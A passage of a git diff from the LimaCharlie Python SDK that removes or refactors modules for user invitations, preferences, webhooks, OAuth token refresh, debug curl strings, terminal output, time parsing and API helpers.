-    parser = argparse.ArgumentParser( prog = 'limacharlie users' )
-    # TODO: We should correctly use argparse subparsers everywhere or use something like click library...
-    subparsers = parser.add_subparsers(title='action', dest='action', required=True)
-    parserInviteAction = subparsers.add_parser('invite', help='Invite a user to the organization')
-    parserInviteAction.add_argument( '--email',
-                         required = False,
-                         action = 'store',
-                         help = 'email (e.g. test@example.com) or a comma separated list of emails (e.g. test1@example.com, test2@example.com) of the users to invite.' )
-    parserInviteAction.add_argument( '--file',
-                         required = False,
-                         action = 'store',
-                         help = 'text file which contains new line delimited list of emails of the users to invite.' )
-    args = parser.parse_args( sourceArgs )
-
-    if args.action == 'invite':
-        if not args.email and not args.file:
-            raise ValueError("Please provide either --email or --file option.")
-
-        if args.email and args.file:
-            raise ValueError("--email and --file are mutually exclusive, please provide only one.")
-        
-        if args.email:
-            emails = parseEmailsFromCsvString(emails=args.email)
-        elif args.file:
-            emails = parseEmailsFromFile(file_path=os.path.abspath(args.file))
-
-        manager = Manager()
-        user = User( manager=manager )
-
-        if len(emails) == 1:
-            user.invite( email=emails[0] )
-        else:
-            user.inviteMulti( emails=emails )
-
-
-if __name__ == '__main__':
-    main()
\ No newline at end of file
diff --git a/limacharlie/UserPreferences.py b/limacharlie/UserPreferences.py
deleted file mode 100644
index 237af7bc..00000000
--- a/limacharlie/UserPreferences.py
+++ /dev/null
@@ -1,35 +0,0 @@
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-import json
-
-from .utils import GET
-from .utils import DELETE
-from .utils import POST
-
-if _IS_PYTHON_2:
-    from urllib import quote as urlescape
-else:
-    from urllib.parse import quote as urlescape
-
-
-class UserPreferences( object ):
-    '''Representation of user preferences in limacharlie.io.'''
-
-    def __init__( self, manager ):
-        self._manager = manager
-
-    def getAll( self ):
-        return self._manager._apiCall( 'preferences', GET, altRoot = 'https://user-preferences.limacharlie.io/' )
-
-    def get( self, key ):
-        return self._manager._apiCall( 'preferences/' + urlescape( key, safe = '' ), GET, altRoot = 'https://user-preferences.limacharlie.io/' )
-
-    def set( self, key, value ):
-        return self._manager._apiCall( 'preferences/' + urlescape( key, safe = '' ), POST, params = {'data': json.dumps(value)}, altRoot = 'https://user-preferences.limacharlie.io/' )
-
-    def delete( self, key ):
-        return self._manager._apiCall( 'preferences/' + urlescape( key, safe = '' ), DELETE, altRoot = 'https://user-preferences.limacharlie.io/' )
\ No newline at end of file
diff --git a/limacharlie/Webhook.py b/limacharlie/Webhook.py
deleted file mode 100644
index 420d4864..00000000
--- a/limacharlie/Webhook.py
+++ /dev/null
@@ -1,28 +0,0 @@
-import hmac
-import hashlib
-
-class Webhook( object ):
-    '''Helper class for various activities related to webhooks from limacharlie.io.'''
-
-    def __init__( self, secret_key ):
-        '''Create a Webhook object.
-
-        Args:
-            secret_key (str): shared secret used in the webhook Output configuration in limacharlie.io.
-        '''
-
-        self._secretKey = secret_key
-
-    def isSignatureValid( self, dataFromHook, signature ):
-        '''Validate the signature from a webhook.
-
-        Args:
-            dataFromHook (str): string found in the "data" element from the webhook.
-            signature (str): signature from the "Lc-Signature" header of the webhook.
-
-        Returns:
-            a boolean where True means the webhook data and signature are valid.
-        '''
-        expected = hmac.new( self._secretKey, msg = dataFromHook, digestmod = hashlib.sha256 ).hexdigest()
-
-        return hmac.compare_digest( str( expected ), str( signature ) )
\ No newline at end of file
diff --git a/limacharlie/WebhookSender.py b/limacharlie/WebhookSender.py
deleted file mode 100644
index 2e634b70..00000000
--- a/limacharlie/WebhookSender.py
+++ /dev/null
@@ -1,62 +0,0 @@
-import json
-import gzip
-import requests
-from urllib.parse import quote
-
-from . import __version__
-from .user_agent_utils import build_user_agent
-
-def _build_webhook_user_agent():
-    """
-    Build a comprehensive User-Agent string for webhook requests.
-
-    Inspired by the Scalyr Agent implementation (Apache 2.0 licensed):
-    https://github.com/scalyr/scalyr-agent-2/blob/97c7405d4a8a7c2d376826779831e6be2753e2ce/scalyr_agent/scalyr_client.py#L881
-
-    The User-Agent includes:
-    - Library version
-    - Python version
-    - Operating system
-    - SSL/TLS version
-
-    Returns:
-        str: Formatted User-Agent string.
-
-    Example User-Agent strings:
-        - Linux: "lc-sdk-webhook/4.10.3;python-3.11.2;debian-12;openssl-3.0.0"
-        - macOS: "lc-sdk-webhook/4.10.3;python-3.11.2;macos-14.0;openssl-3.0.0"
-        - Windows: "lc-sdk-webhook/4.10.3;python-3.11.2;windows-10;openssl-3.0.0"
-    """
-    return build_user_agent('lc-sdk-webhook', __version__)
-
-class WebhookSender(object):
-    def __init__(self, manager, hook_name, secret_value):
-        self._manager = manager
-        urls = self._manager.getOrgURLs()
-        if 'hooks' not in urls:
-            raise ValueError("Hook URL not found in org URLs")
-
-        hook_url = urls['hooks']
-        self.url = f"https://{hook_url}/{self._manager._oid}/{quote(hook_name)}/{quote(secret_value)}"
-        self.client = requests.Session()
-        self.client.timeout = 30  # 30 seconds timeout
-
-    def send(self, data):
-        try:
-            b = gzip.compress(json.dumps(data).encode())
-            headers = {
-                "Content-Type": "application/json",
-                "Content-Encoding": "gzip",
-                "User-Agent": _build_webhook_user_agent()
-            }
-            response = self.client.post(self.url, data=b, headers=headers)
-        except Exception as e:
-            raise Exception(f"Error sending data: {e}")
-
-        if response.status_code != 200:
-            raise Exception(f"HTTP status code {response.status_code}: {response.text}")
-
-        return None
-
-    def close(self):
-        self.client.close()
diff --git a/limacharlie/__init__.py b/limacharlie/__init__.py
index 19b2716d..efa2bdc7 100644
--- a/limacharlie/__init__.py
+++ b/limacharlie/__init__.py
@@ -1,81 +1,8 @@
-"""limacharlie API for limacharlie.io"""
+"""limacharlie SDK for limacharlie.io"""
 
-__version__ = "4.11.3"
-__author__ = "Maxime Lamothe-Brassard ( Refraction Point, Inc )"
-__author_email__ = "maxime@refractionpoint.com"
-__license__ = "Apache v2"
-__copyright__ = "Copyright (c) 2020 Refraction Point, Inc"
-
-# Global API Credentials
-import os
-import yaml
-
-from .constants import CONFIG_FILE_PATH, EPHEMERAL_CREDS_ENV_VAR
-
-
-def _getEnvironmentCreds( name ):
-    # If ephemeral credentials mode is enabled, skip disk operations entirely
-    if os.environ.get( EPHEMERAL_CREDS_ENV_VAR ):
-        return ( None, None, None, None )
-
-    credsFile = os.environ.get( 'LC_CREDS_FILE', None )
-    if credsFile is None:
-        credsFile = CONFIG_FILE_PATH
-    if not os.path.isfile( credsFile ):
-        return ( None, None, None, None )
-    with open( credsFile, 'rb' ) as f:
-        credsFile = yaml.safe_load( f.read() )
-
-        if name == 'default':
-            # Default creds are at the top of the creds file.
-            oid = credsFile.get( 'oid', None )
-            uid = credsFile.get( 'uid', None )
-            key = credsFile.get( 'api_key', None )
-            oauth = credsFile.get( 'oauth', None )
+from .client import __version__
 
-            return ( oid, uid, key, oauth )
-
-        if name not in credsFile.get( 'env', {} ):
-            return ( None, None, None, None )
-
-        envData = credsFile[ 'env' ][ name ]
-        oid = envData.get( 'oid', None )
-        uid = envData.get( 'uid', None )
-        key = envData.get( 'api_key', None )
-        oauth = envData.get( 'oauth', None )
-
-        return ( oid, uid, key, oauth )
-
-# Global credentials are acquired in the following order:
-# 1- LC_OID and LC_API_KEY environment variables.
-# 2- LC_CREDS_FILE environment variable points to a YAML file with "oid: <OID>" and "api_key: <KEY>".
-# 3- Assumes a creds file (like #2) is present at "~/.limacharlie".
-GLOBAL_OID = os.environ.get( 'LC_OID', None )
-GLOBAL_UID = os.environ.get( 'LC_UID', None )
-GLOBAL_API_KEY = os.environ.get( 'LC_API_KEY', None )
-GLOBAL_OAUTH = None
-if GLOBAL_API_KEY is None:
-    _lcEnv = os.environ.get( 'LC_CURRENT_ENV', 'default' )
-    if _lcEnv == '':
-        _lcEnv = 'default'
-    GLOBAL_OID, GLOBAL_UID, GLOBAL_API_KEY, GLOBAL_OAUTH = _getEnvironmentCreds( _lcEnv )
-
-from .Manager import Manager
-from .Firehose import Firehose
-from .Spout import Spout
-from .Webhook import Webhook
-from .Sync import Sync
-from .Configs import Configs
-from .SpotCheck import SpotCheck
-from .Payloads import Payloads
-from .Logs import Logs
-from .Logs import Logs as Artifacts
-from .Hive import Hive
-from .Hive import HiveRecord
-from .Extensions import Extension
-from .Billing import Billing
-from .utils import LcApiException
-from . import Replicants as services
-from .WebhookSender import WebhookSender
-from .UserPreferences import UserPreferences
-from .User import User
+__author__ = "Refraction Point, Inc"
+__author_email__ = "info@refractionpoint.com"
+__license__ = "Apache v2"
+__copyright__ = "Copyright (c) 2026 Refraction Point, Inc"
diff --git a/limacharlie/oauth.py b/limacharlie/oauth.py
deleted file mode 100644
index ec5cdece..00000000
--- a/limacharlie/oauth.py
+++ /dev/null
@@ -1,81 +0,0 @@
-"""
-OAuth utilities for token management.
-"""
-
-import time
-import requests
-from typing import Dict
-
-from .constants import FIREBASE_API_KEY
-
-
-class OAuthManager:
-    """Utility class for OAuth token management."""
-    
-    # Firebase configuration
-    FIREBASE_TOKEN_URL = 'https://securetoken.googleapis.com/v1/token'
-    
-    @staticmethod
-    def is_token_expired(expires_at: int) -> bool:
-        """
-        Check if a token has expired.
-        
-        Args:
-            expires_at: Unix timestamp when token expires
-            
-        Returns:
-            True if token is expired, False otherwise
-        """
-        if not expires_at:
-            return True
-        
-        # Add a 5-minute buffer to refresh tokens before they expire
-        buffer_seconds = 300
-        current_time = int(time.time())
-        
-        return current_time >= (expires_at - buffer_seconds)
-    
-    @staticmethod
-    def refresh_token(refresh_token: str) -> Dict[str, str]:
-        """
-        Refresh Firebase OAuth tokens.
-        
-        Args:
-            refresh_token: The refresh token from Firebase
-            
-        Returns:
-            Dictionary with new tokens and expiry
-            
-        Raises:
-            Exception: If token refresh fails
-        """
-        payload = {
-            'grant_type': 'refresh_token',
-            'refresh_token': refresh_token
-        }
-        
-        try:
-            response = requests.post(
-                f"{OAuthManager.FIREBASE_TOKEN_URL}?key={FIREBASE_API_KEY}",
-                data=payload,
-                headers={'Content-Type': 'application/x-www-form-urlencoded'}
-            )
-            
-            if response.status_code != 200:
-                error_data = response.json()
-                raise Exception(f"Token refresh failed: {error_data.get('error', {}).get('message', 'Unknown error')}")
-            
-            data = response.json()
-            
-            # Calculate new expiry timestamp
-            expires_in = int(data.get('expires_in', '3600'))
-            expires_at = int(time.time()) + expires_in
-            
-            return {
-                'id_token': data['id_token'],
-                'refresh_token': data['refresh_token'],
-                'expires_at': expires_at
-            }
-            
-        except requests.exceptions.RequestException as e:
-            raise Exception(f"Failed to refresh token: {str(e)}")
\ No newline at end of file
diff --git a/limacharlie/request_utils.py b/limacharlie/request_utils.py
deleted file mode 100644
index 9c75f84d..00000000
--- a/limacharlie/request_utils.py
+++ /dev/null
@@ -1,47 +0,0 @@
-import sys
-import shlex
-
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-
-if _IS_PYTHON_2:
-    from urllib2 import Request as URLRequest
-else:
-    from urllib.request import Request as URLRequest
-
-
-def getCurlCommandString(request: URLRequest):
-    """
-    Budl cURL command string for a specific request to aid with debugging.
-
-    Args:
-        request: The request object to build the cURL command from.
-    """
-    parts = ["curl"]
-
-    # Determine HTTP method (default to GET if not available)
-    method = request.get_method() if hasattr(request, "get_method") else "GET"
-    parts.extend(["-X", shlex.quote(method)])
-
-    # Extract and add headers from the request.
-    # request.header_items() returns a list of (header, value) pairs.
-    if hasattr(request, "header_items"):
-        for header, value in request.header_items():
-            parts.extend(["-H", shlex.quote(f"{header}: {value}")])
-
-    # If there's a data payload, add it.
-    if request.data:
-        try:
-            data_str = request.data.decode("utf-8")
-        except Exception:
-            data_str = str(request.data)
-        parts.extend(["-d", shlex.quote(data_str)])
-
-    # Append the URL. Use get_full_url() if available.
-    url = request.get_full_url() if hasattr(request, "get_full_url") else request.full_url
-    parts.append(shlex.quote(url))
-
-    # Join the parts into a single string command.
-    return " ".join(parts)
diff --git a/limacharlie/term_utils.py b/limacharlie/term_utils.py
deleted file mode 100644
index 9c01fcdb..00000000
--- a/limacharlie/term_utils.py
+++ /dev/null
@@ -1,247 +0,0 @@
-import os
-import sys
-import re
-import json
-import math
-import shutil
-
-
-try:
-    from pygments import highlight, lexers, formatters
-    has_pygments = True
-except ImportError:
-    has_pygments = False
-    highlight, lexers, formatters = None, None, None
-
-try:
-    from rich.console import Console
-    has_rich = True
-except ImportError:
-    # If rich is not available, we will use the basic print function.
-    has_rich = False
-    Console = None
-
-# If there are more than this number of facets fields, we will only print this number.
-MAX_FACET_FIELD_COUNT = 20
-
-# If there are more than this number of values for a facet, we will only print this number.
-MAX_FACET_VALUE_COUNT = 10
-
-# All the histogram bars will be scaled to fit in this number of rows.
-MAX_HISTOGRAM_BAR_HEIGHT = 10
-
-
-class ConsoleFallback:
-    def print(self, message: str) -> None:
-        """
-        Fallback to the basic print function if rich is not available.
-
-        It strips any text formatting from the message before printing it.
-        """
-        message = re.sub(r'\[.*?\]', '', message)
-        print(message)
-
-
-def printFacets(facets: dict) -> None:
-    """
-    Prints facets in a formatted manner, for example:
-
-    * routing.event_type:
-      - NEW_PROCESS: 3
-    * event.COMMAND_LINE:
-      - taskhostw.exe: 2
-      - taskhostw.exe is evil: 1
-    """
-    console = Console() if has_rich else ConsoleFallback()
-
-    console.print("[bold cyan]Facets[/bold cyan]\n")
-
-    if not facets:
-        console.print("[bold red]No facets available.[/bold red]")
-        return
-
-    i, j = 0, 0
-    for facet, values in facets.items():
-        i += 1
-
-        if i >= MAX_FACET_FIELD_COUNT:
-            console.print(f"* ... (truncated, only displaying first {MAX_FACET_FIELD_COUNT}) entries ...")
-            break
-
-        console.print(f"* {facet}:")
-
-        j = 0
-        for key, count in values.items():
-            j += 1
-            if j > MAX_FACET_VALUE_COUNT:
-                console.print(f"  - ... (truncated, only displaying first {MAX_FACET_VALUE_COUNT}) entries ...")
-                break
-
-            console.print(f"  - {key}: {count}")
-
-    console.print("")
-
-
-def printHistogram(hist_data, col_width=25):
-    """
-    Prints a histogram where timestamps are displayed on the left and bars are represented by # symbols.
-    """
-    console = Console() if has_rich else ConsoleFallback()
-    console.print("[bold cyan]Histogram[/bold cyan]\n")
-
-    if not hist_data:
-        console.print("[bold red]No histogram data available.[/bold red]")
-        return
-
-    # Sort the keys for consistent ordering.
-    keys = sorted(hist_data.keys())
-    max_count = max(hist_data.values())
-
-    # Determine if scaling is needed.
-    if max_count > MAX_HISTOGRAM_BAR_HEIGHT:
-        # Scale counts to MAX_BAR_HEIGHT so that the largest bar reaches MAX_BAR_HEIGHT rows.
-        scaled_data = { key: math.ceil(value * MAX_HISTOGRAM_BAR_HEIGHT/ max_count) for key, value in hist_data.items() }
-        effective_max = MAX_HISTOGRAM_BAR_HEIGHT
-    else:
-        scaled_data = hist_data
-        effective_max = max_count
-
-    # Build and print each row from effective_max down to 1.
-    for level in range(effective_max, 0, -1):
-        row_str = ""
-        for key in keys:
-            if scaled_data[key] >= level:
-                row_str += " " + "█".center(col_width) + " "
-            else:
-                row_str += " " + " ".center(col_width) + " "
-        console.print(row_str)
-
-    # Print a separator line.
-    separator = ""
-    for _ in keys:
-        separator += " " + ("-" * col_width).center(col_width) + " "
-    console.print(separator)
-
-    # Print the labels centered under each column.
-    label_str = ""
-    for key in keys:
-        # If the key is longer than col_width, truncate it.
-        label = key if len(key) <= col_width else key[:col_width]
-        label = f"{label} ({hist_data[key]})"
-        label_str += " " + label.center(col_width) + " "
-    console.print(label_str)
-
-def printHistogram(hist_data, col_width=25):
-    """
-    Prints a histogram where timestamps are displayed on the left and bars are represented by block symbols.
-
-    Limits the histogram to entries that fit within the current console width.
-    Each histogram column is given a width of col_width plus some spacing.
-    If there are more entries than can fit on one line, only the first ones are shown.
-
-    Bars are scaled so that if the maximum count exceeds MAX_HISTOGRAM_BAR_HEIGHT,
-    all bars are proportionally scaled to have a maximum height of MAX_HISTOGRAM_BAR_HEIGHT.
-    """
-    console = Console() if has_rich else ConsoleFallback()
-    console.print("[bold cyan]Histogram[/bold cyan]\n")
-
-    if not hist_data:
-        console.print("[bold red]No histogram data available.[/bold red]")
-        return
-
-    # Sort keys for consistent ordering.
-    keys = sorted(hist_data.keys())
-
-    # Determine the console width.
-    try:
-        console_width = console.size.width
-    except AttributeError:
-        console_width = shutil.get_terminal_size((80, 24)).columns
-
-    # Each column takes up col_width + 2 characters (1 space before and after)
-    max_entries_allowed = console_width // (col_width + 2)
-    total_entries = len(keys)
-    truncated = False
-    if total_entries > max_entries_allowed:
-        keys = keys[:max_entries_allowed]
-        truncated = True
-
-    # Calculate the maximum count among the selected keys.
-    max_count = max(hist_data[key] for key in keys)
-
-    # Scale counts if needed.
-    if max_count > MAX_HISTOGRAM_BAR_HEIGHT:
-        scaled_data = {key: math.ceil(hist_data[key] * MAX_HISTOGRAM_BAR_HEIGHT / max_count) for key in keys}
-        effective_max = MAX_HISTOGRAM_BAR_HEIGHT
-    else:
-        scaled_data = {key: hist_data[key] for key in keys}
-        effective_max = max_count
-
-    # Build and print each row from effective_max down to 1.
-    for level in range(effective_max, 0, -1):
-        row_str = ""
-        for key in keys:
-            if scaled_data[key] >= level:
-                row_str += " " + "█".center(col_width) + " "
-            else:
-                row_str += " " + " ".center(col_width) + " "
-        console.print(row_str)
-
-    # Print a separator line.
-    separator = ""
-    for _ in keys:
-        separator += " " + ("-" * col_width).center(col_width) + " "
-    console.print(separator)
-
-    # Print the labels centered under each column.
-    label_str = ""
-    for key in keys:
-        # Truncate label if longer than col_width.
-        label = key if len(key) <= col_width else key[:col_width]
-        label = f"{label} ({hist_data[key]})"
-        label_str += " " + label.center(col_width) + " "
-    console.print(label_str)
-
-    # If some entries were truncated, show a summary message.
-    if truncated:
-        console.print(f"\nShowing first {len(keys)} histogram entries out of {total_entries} total entries.")
-
-
-def useColors():
-    """
-    Return true if we should use ANSI colors in the output.
-    :return: True if ANSI colors should be used, False otherwise.
-    """
-    # Check if stdout is a tty (i.e., terminal)
-    if not sys.stdout.isatty():
-        return False
-
-    # Optionally, disable colors if the NO_COLOR environment variable is set
-    if "NO_COLOR" in os.environ:
-        return False
-
-    # Also, sometimes checking TERM helps to avoid "dumb" terminals
-    term = os.environ.get("TERM", "")
-    if term == "dumb":
-        return False
-
-    return True
-
-def prettyFormatDict(data: dict, use_colors: bool = None, indent: int = 2) -> str:
-    """
-    Pretty format a dictionary to a string, optionally with ANSI colors.
-
-    :param data: The dictionary to format.
-    :param use_colors: Whether to use ANSI colors.
-    :param ident: The number of spaces to use for indentation.
-    :return: The formatted string.
-    """
-    formatted_json = json.dumps(data, sort_keys=True, indent=indent)
-
-    use_colors = (use_colors if use_colors is not None else useColors())
-    if has_pygments and use_colors:
-        result = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
-    else:
-        result = formatted_json
-
-    return result
diff --git a/limacharlie/time_utils.py b/limacharlie/time_utils.py
deleted file mode 100644
index ae7b74d8..00000000
--- a/limacharlie/time_utils.py
+++ /dev/null
@@ -1,184 +0,0 @@
-"""
-Time parsing utilities for LimaCharlie SDK.
-
-Supports multiple time formats:
-- Relative times: "now", "now-10m", "now-1h", "now-7d"
-- ISO dates: "2025-12-30", "2025-12-30 10:00:00"
-- Unix timestamps: 1234567890 (seconds or milliseconds)
-"""
-
-import re
-import time
-from datetime import datetime, timedelta, timezone
-
-
-def parse_time_input(time_str):
-    """
-    Parse a time string in various formats and return Unix timestamp (seconds).
-
-    Supported formats:
-    - "now" - Current time
-    - "now-10m" - 10 minutes ago
-    - "now-1h" - 1 hour ago
-    - "now-7d" - 7 days ago
-    - "now-2w" - 2 weeks ago
-    - "2025-12-30" - ISO date (assumed UTC)
-    - "2025-12-30 10:00:00" - ISO datetime (assumed UTC)
-    - "2025-12-30T10:00:00" - ISO datetime with T separator
-    - "2025-12-30T10:00:00Z" - ISO datetime with timezone
-    - "2025-12-30T10:00:00+05:00" - ISO datetime with timezone offset
-    - "1234567890" - Unix timestamp (seconds)
-    - "1234567890000" - Unix timestamp (milliseconds, auto-detected)
-
-    Parameters:
-        time_str (str or int): Time string or timestamp to parse.
-
-    Return:
-        int: Unix timestamp in seconds.
-
-    Raises:
-        ValueError: If the time format is not recognized.
-    """
-    # Handle None or empty string
-    if time_str is None or time_str == '':
-        raise ValueError("Time string cannot be empty")
-
-    # Convert to string if it's a number
-    if isinstance(time_str, (int, float)):
-        time_str = str(int(time_str))
-
-    time_str = time_str.strip()
-
-    # Handle "now"
-    if time_str.lower() == "now":
-        return int(time.time())
-
-    # Handle relative times like "now-10m", "now-1h", "now-7d"
-    relative_match = re.match(r'^now\s*-\s*(\d+)\s*([smhdwMy])$', time_str, re.IGNORECASE)
-    if relative_match:
-        amount = int(relative_match.group(1))
-        # Keep original case for 'M' vs 'm' distinction (months vs minutes)
-        unit = relative_match.group(2)
-
-        # Calculate the timedelta
-        # Note: 'm' (lowercase) = minutes, 'M' (uppercase) = months
-        if unit.lower() == 's':
-            delta = timedelta(seconds=amount)
-        elif unit == 'm':  # Lowercase only = minutes
-            delta = timedelta(minutes=amount)
-        elif unit.lower() == 'h':
-            delta = timedelta(hours=amount)
-        elif unit.lower() == 'd':
-            delta = timedelta(days=amount)
-        elif unit.lower() == 'w':
-            delta = timedelta(weeks=amount)
-        elif unit == 'M':  # Uppercase only = months (approximate as 30 days)
-            delta = timedelta(days=amount * 30)
-        elif unit.lower() == 'y':  # Years (approximate as 365 days)
-            delta = timedelta(days=amount * 365)
-        else:
-            raise ValueError(f"Unknown time unit: {unit}")
-
-        # Calculate the timestamp
-        target_time = datetime.now(timezone.utc) - delta
-        return int(target_time.timestamp())
-
-    # Try to parse as Unix timestamp (seconds or milliseconds)
-    if time_str.isdigit():
-        timestamp = int(time_str)
-
-        # Auto-detect milliseconds vs seconds
-        # Timestamps > 10^10 are likely milliseconds (after year 2286 in seconds)
-        if timestamp > 10_000_000_000:
-            # Milliseconds
-            return timestamp // 1000
-        else:
-            # Seconds
-            return timestamp
-
-    # Try to parse as ISO date/datetime
-    # Supported formats:
-    # - "2025-12-30"
-    # - "2025-12-30 10:00:00"
-    # - "2025-12-30T10:00:00"
-    # - "2025-12-30T10:00:00Z"
-    # - "2025-12-30T10:00:00+05:00"
-    # - "2025-12-30T10:00:00.123456Z"
-
-    # List of formats to try
-    formats = [
-        "%Y-%m-%dT%H:%M:%S.%fZ",       # ISO with microseconds and Z
-        "%Y-%m-%dT%H:%M:%S.%f%z",      # ISO with microseconds and timezone
-        "%Y-%m-%dT%H:%M:%SZ",          # ISO with Z
-        "%Y-%m-%dT%H:%M:%S%z",         # ISO with timezone offset
-        "%Y-%m-%dT%H:%M:%S",           # ISO with T separator
-        "%Y-%m-%d %H:%M:%S.%f",        # With microseconds
-        "%Y-%m-%d %H:%M:%S",           # Date and time with space
-        "%Y-%m-%d",                    # Date only
-    ]
-
-    for fmt in formats:
-        try:
-            # Parse the datetime
-            dt = datetime.strptime(time_str, fmt)
-
-            # If no timezone info, assume UTC
-            if dt.tzinfo is None:
-                dt = dt.replace(tzinfo=timezone.utc)
-
-            return int(dt.timestamp())
-        except ValueError:
-            continue
-
-    # If nothing worked, raise an error
-    raise ValueError(
-        f"Unable to parse time: '{time_str}'. "
-        f"Supported formats: 'now', 'now-10m', '2025-12-30', '2025-12-30 10:00:00', "
-        f"'2025-12-30T10:00:00Z', Unix timestamp (seconds or milliseconds)"
-    )
-
-
-def parse_time_range(start_str, end_str):
-    """
-    Parse start and end time strings and return Unix timestamps.
-
-    Parameters:
-        start_str (str or int): Start time in any supported format.
-        end_str (str or int): End time in any supported format.
-
-    Return:
-        tuple: (start_timestamp, end_timestamp) as integers (seconds).
-
-    Raises:
-        ValueError: If either time format is not recognized or if start > end.
-    """
-    start_ts = parse_time_input(start_str)
-    end_ts = parse_time_input(end_str)
-
-    # Validate that start is before end
-    if start_ts > end_ts:
-        raise ValueError(
-            f"Start time ({start_ts}, {datetime.fromtimestamp(start_ts, tz=timezone.utc)}) "
-            f"is after end time ({end_ts}, {datetime.fromtimestamp(end_ts, tz=timezone.utc)})"
-        )
-
-    return start_ts, end_ts
-
-
-def format_timestamp(timestamp, use_iso=True):
-    """
-    Format a Unix timestamp as a human-readable string.
-
-    Parameters:
-        timestamp (int): Unix timestamp in seconds.
-        use_iso (bool): If True, use ISO format; otherwise use local time format.
-
-    Return:
-        str: Formatted timestamp string.
-    """
-    dt = datetime.fromtimestamp(timestamp, tz=timezone.utc)
-
-    if use_iso:
-        return dt.isoformat()
-    else:
-        return dt.strftime('%Y-%m-%d %H:%M:%S UTC')
diff --git a/limacharlie/utils.py b/limacharlie/utils.py
deleted file mode 100644
index 8d2bcadb..00000000
--- a/limacharlie/utils.py
+++ /dev/null
@@ -1,362 +0,0 @@
-# Detect if this is Python 2 or 3
-from concurrent.futures import ThreadPoolExecutor, TimeoutError
-import os
-import yaml
-import tempfile
-import sys
-import stat
-import shutil
-from time import time
-
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-try:
-    FileNotFoundError
-except NameError:
-    # Python 2 compatibility
-    FileNotFoundError = IOError
-
-import threading
-import time
-
-from .constants import CONFIG_FILE_PATH, EPHEMERAL_CREDS_ENV_VAR
-
-
-class LcApiException ( Exception ):
-    '''Exception type used for various errors in the LimaCharlie SDK.'''
-
-    def __init__(self, message, code=None):
-        """
-        Initialize the exception with a message and an optional status code.
-
-        Args:
-            message (str): The error message.
-            code (int, optional): An optional status code returnd by the API. Defaults to None.
-        """
-        super().__init__(message)
-        self.code = code
-
-
-GET = 'GET'
-POST = 'POST'
-DELETE = 'DELETE'
-PUT = 'PUT'
-HEAD = 'HEAD'
-PATCH = 'PATCH'
-
-class FutureResults( object ):
-    '''Represents a Future promise of results from a task sent to a Sensor.'''
-
-    def __init__( self ):
-        self._nReceivedResults = 0
-        self._newResultEvent = threading.Event()
-        self._results = []
-        self._lock = threading.Lock()
-        self.wasReceived = False
-
-    def _addNewResult( self, res ):
-        with self._lock:
-            if 'CLOUD_NOTIFICATION' == res[ 'routing' ][ 'event_type' ]:
-                self.wasReceived = True
-            else:
-                res = _enhancedDict( res )
-                res[ 'routing' ] = _enhancedDict( res[ 'routing' ] )
-                res[ 'event' ] = _enhancedDict( res[ 'event' ] )
-                self._results.append( res )
-                self._nReceivedResults += 1
-                self._newResultEvent.set()
-
-    def getNewResponses( self, timeout = None ):
-        '''Get new responses available, blocking for up to timeout seconds.
-
-        Args:
-            timeout (float): number of seconds to block for new results.
-
-        Returns:
-            a list of new results, or an empty list if timeout is reached.
-        '''
-
-        if self._newResultEvent.wait( timeout = timeout ):
-            with self._lock:
-                self._newResultEvent.clear()
-                ret = self._results
-                self._results = []
-            return ret
-        return []
-
-def enhanceEvent( evt ):
-    '''Wrap an event with an _enhancedDict providing utility functions getOne() and getAll().
-
-    Args:
-        evt (dict): event to wrap.
-
-    Returns:
-        wrapped event.
-    '''
-
-    if 'event' in evt:
-        evt[ 'event' ] = _enhancedDict( evt[ 'event' ] )
-    if 'routing' in evt:
-        evt[ 'routing' ] = _enhancedDict( evt[ 'routing' ] )
-    return _enhancedDict( evt )
-
-# Helper functions
-class _enhancedDict( dict ):
-    '''Dictionary with helper functions getOne() and getAll() to get element at given path.'''
-
-    def getAll( self, *args, **kwargs ):
-        '''Get all elements in matching path.
-
-        Args:
-            path (str): path to get within the data.
-
-        Returns:
-            list of matching elements.
-        '''
-
-        return _xm_( self, *args, **kwargs )
-
-    def getOne( self, *args, **kwargs ):
-        '''Get one element in matching path.
-
-        Args:
-            path (str): path to get within the data.
-
-        Returns:
-            matching element or None if not found.
-        '''
-
-        return _x_( self, *args, **kwargs )
-
-def _isDynamicType( e ):
-    return isinstance( e, ( dict, list, tuple ) )
-
-def _isListType( e ):
-    return isinstance( e, ( list, tuple ) )
-
-def _isSeqType( e ):
-    return isinstance( e, dict )
-
-def _xm_( o, path, isWildcardDepth = False ):
-    result = []
-
-    if _isStringCompat( path ):
-        if '/' == path:
-            # Special case where we want a NOOP path
-            return [ o ]
-        tokens = [ x for x in path.split( '/' ) if x != '' ]
-    else:
-        tokens = path
-
-    if isinstance( o, dict ):
-        isEndPoint = False
-        if 0 != len( tokens ):
-            if 1 == len( tokens ):
-                isEndPoint = True
-
-            curToken = tokens[ 0 ]
-
-            if '*' == curToken:
-                if 1 < len( tokens ):
-                    result = _xm_( o, tokens[ 1 : ], True )
-            elif '?' == curToken:
-                if 1 < len( tokens ):
-                    result = []
-                    for elem in o.values():
-                        if _isDynamicType( elem ):
-                            result += _xm_( elem, tokens[ 1 : ], False )
-
-            elif curToken in o:
-                if isEndPoint:
-                    result = [ o[ curToken ] ] if not _isListType( o[ curToken ] ) else o[ curToken ]
-                elif _isDynamicType( o[ curToken ] ):
-                    result = _xm_( o[ curToken ], tokens[ 1 : ] )
-
-            if isWildcardDepth:
-                tmpTokens = tokens[ : ]
-                for elem in o.values():
-                    if _isDynamicType( elem ):
-                        result += _xm_( elem, tmpTokens, True )
-    elif isinstance( o, ( list, tuple ) ):
-        result = []
-        for elem in o:
-            if _isDynamicType( elem ):
-                result += _xm_( elem, tokens, isWildcardDepth )
-
-    return result
-
-def _x_( o, path, isWildcardDepth = False ):
-    r = _xm_( o, path, isWildcardDepth )
-    if 0 != len( r ):
-        r = r[ 0 ]
-    else:
-        r = None
-    return r
-
-def _isStringCompat( s ):
-    if _IS_PYTHON_2:
-        return isinstance( s, ( str, unicode ) ) # noqa: F821
-    return isinstance( s, str )
-
-def parallelExec( f, objects, timeout = None, maxConcurrent = None ):
-    '''Execute a function on a list of objects in parallel.
-
-    Args:
-        f (callable): function to apply to each object.
